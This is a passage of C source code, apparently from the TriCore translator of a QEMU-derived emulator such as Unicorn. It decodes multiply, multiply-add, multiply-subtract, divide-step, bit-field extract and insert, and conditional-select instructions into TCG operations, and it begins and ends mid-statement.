tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 0); break; case OPC2_32_RR1_MUL_Q_32_L: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_mul_q(ctx, tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RR1_MUL_Q_64_L: CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_mul_q(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n, 0); break; case OPC2_32_RR1_MUL_Q_32_U: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_mul_q(ctx, tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RR1_MUL_Q_64_U: CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_mul_q(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n, 0); break; case OPC2_32_RR1_MUL_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_mul_q_16(ctx, tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RR1_MUL_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_mul_q_16(ctx, tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RR1_MULR_Q_32_L: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_mulr_q(ctx, tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RR1_MULR_Q_32_U: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_mulr_q(ctx, tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } /* RR2 format */ static void decode_rr2_mul(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; op2 = MASK_OP_RR2_OP2(ctx->opcode); r1 = MASK_OP_RR2_S1(ctx->opcode); r2 = MASK_OP_RR2_S2(ctx->opcode); r3 = MASK_OP_RR2_D(ctx->opcode); switch (op2) { case OPC2_32_RR2_MUL_32: gen_mul_i32s(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR2_MUL_64: CHECK_REG_PAIR(r3); gen_mul_i64s(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR2_MULS_32: gen_helper_mul_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR2_MUL_U_64: CHECK_REG_PAIR(r3); gen_mul_i64u(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RR2_MULS_U_32: gen_helper_mul_suov(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RRPW format */ static void decode_rrpw_extract_insert(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int32_t pos, width; TCGv temp; op2 = MASK_OP_RRPW_OP2(ctx->opcode); r1 = MASK_OP_RRPW_S1(ctx->opcode); r2 = MASK_OP_RRPW_S2(ctx->opcode); r3 = MASK_OP_RRPW_D(ctx->opcode); pos = MASK_OP_RRPW_POS(ctx->opcode); width = MASK_OP_RRPW_WIDTH(ctx->opcode); switch (op2) { case OPC2_32_RRPW_EXTR: if (width == 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], 0); break; } if (pos + width <= 32) { /* optimize special cases */ if ((pos == 0) && (width == 8)) { tcg_gen_ext8s_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); } else if ((pos == 0) && (width == 16)) { tcg_gen_ext16s_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1]); } else { tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], 32 - pos - width); tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], 32 - width); } } break; case OPC2_32_RRPW_EXTR_U: if (width == 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], 0); } else { tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], pos); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], ~0u >> (32-width)); } break; case OPC2_32_RRPW_IMASK: CHECK_REG_PAIR(r3); if (pos + width <= 32) { temp = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, temp, ((1u << width) - 1) << pos); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2], pos); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3 + 1], temp); tcg_temp_free(tcg_ctx, temp); } break; case OPC2_32_RRPW_INSERT: if (pos + width <= 32) { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos, width); } break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RRR format */ static void decode_rrr_cond_select(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3, r4; TCGv temp; op2 = MASK_OP_RRR_OP2(ctx->opcode); r1 = MASK_OP_RRR_S1(ctx->opcode); r2 = MASK_OP_RRR_S2(ctx->opcode); r3 = MASK_OP_RRR_S3(ctx->opcode); r4 = MASK_OP_RRR_D(ctx->opcode); switch (op2) { case OPC2_32_RRR_CADD: gen_cond_add(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_CADDN: gen_cond_add(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_CSUB: gen_cond_sub(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_CSUBN: gen_cond_sub(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_SEL: temp = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); tcg_temp_free(tcg_ctx, temp); break; case OPC2_32_RRR_SELN: temp = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); tcg_temp_free(tcg_ctx, temp); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rrr_divide(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3, r4; op2 = MASK_OP_RRR_OP2(ctx->opcode); r1 = MASK_OP_RRR_S1(ctx->opcode); r2 = MASK_OP_RRR_S2(ctx->opcode); r3 = MASK_OP_RRR_S3(ctx->opcode); r4 = MASK_OP_RRR_D(ctx->opcode); switch (op2) { case OPC2_32_RRR_DVADJ: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, dvadj, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_DVSTEP: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, dvstep, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_DVSTEP_U: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, dvstep_u, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_IXMAX: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, ixmax, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_IXMAX_U: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, ixmax_u, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_IXMIN: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, ixmin, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_IXMIN_U: CHECK_REG_PAIR(r3); CHECK_REG_PAIR(r4); GEN_HELPER_RRR(tcg_ctx, ixmin_u, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR_PACK: CHECK_REG_PAIR(r3); gen_helper_pack(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_PSW_C, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1]); break; case OPC2_32_RRR_ADD_F: gen_helper_fadd(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_SUB_F: gen_helper_fsub(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_MADD_F: gen_helper_fmadd(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r3]); break; case OPC2_32_RRR_MSUB_F: gen_helper_fmsub(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r3]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RRR2 format */ static void decode_rrr2_madd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4; op2 = MASK_OP_RRR2_OP2(ctx->opcode); r1 = MASK_OP_RRR2_S1(ctx->opcode); r2 = MASK_OP_RRR2_S2(ctx->opcode); r3 = MASK_OP_RRR2_S3(ctx->opcode); r4 = MASK_OP_RRR2_D(ctx->opcode); switch (op2) { case OPC2_32_RRR2_MADD_32: gen_madd32_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MADD_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madd64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MADDS_32: gen_helper_madd32_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MADDS_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madds_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MADD_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddu64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MADDS_U_32: gen_helper_madd32_suov(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MADDS_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsu_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rrr2_msub(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4; op2 = MASK_OP_RRR2_OP2(ctx->opcode); r1 = MASK_OP_RRR2_S1(ctx->opcode); r2 = MASK_OP_RRR2_S2(ctx->opcode); r3 = MASK_OP_RRR2_S3(ctx->opcode); r4 = MASK_OP_RRR2_D(ctx->opcode); switch (op2) { case OPC2_32_RRR2_MSUB_32: gen_msub32_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MSUB_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msub64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MSUBS_32: gen_helper_msub32_ssov(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MSUBS_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubs_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MSUB_U_64: gen_msubu64_d(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MSUBS_U_32: gen_helper_msub32_suov(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_env, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2]); break; case OPC2_32_RRR2_MSUBS_U_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubsu_64(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RRR1 format */ static void decode_rrr1_madd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4, n; op2 = MASK_OP_RRR1_OP2(ctx->opcode); r1 = MASK_OP_RRR1_S1(ctx->opcode); r2 = MASK_OP_RRR1_S2(ctx->opcode); r3 = MASK_OP_RRR1_S3(ctx->opcode); r4 = MASK_OP_RRR1_D(ctx->opcode); n = MASK_OP_RRR1_N(ctx->opcode); switch (op2) { case OPC2_32_RRR1_MADD_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madd_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADD_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madd_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADD_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madd_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADD_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madd_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDS_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madds_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDS_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madds_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDS_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madds_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDS_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madds_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDM_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDM_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDM_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDM_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDMS_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDMS_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDMS_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDMS_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDR_H_LL: gen_maddr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDR_H_LU: gen_maddr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDR_H_UL: gen_maddr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDR_H_UU: gen_maddr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDRS_H_LL: gen_maddr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDRS_H_LU: gen_maddr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDRS_H_UL: gen_maddr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDRS_H_UU: gen_maddr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rrr1_maddq_h(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4, n; TCGv temp, temp2; op2 = MASK_OP_RRR1_OP2(ctx->opcode); r1 = MASK_OP_RRR1_S1(ctx->opcode); r2 = MASK_OP_RRR1_S2(ctx->opcode); r3 = MASK_OP_RRR1_S3(ctx->opcode); r4 = MASK_OP_RRR1_D(ctx->opcode); n = MASK_OP_RRR1_N(ctx->opcode); temp = tcg_const_i32(tcg_ctx, n); temp2 = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RRR1_MADD_Q_32: gen_madd32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 32); break; case 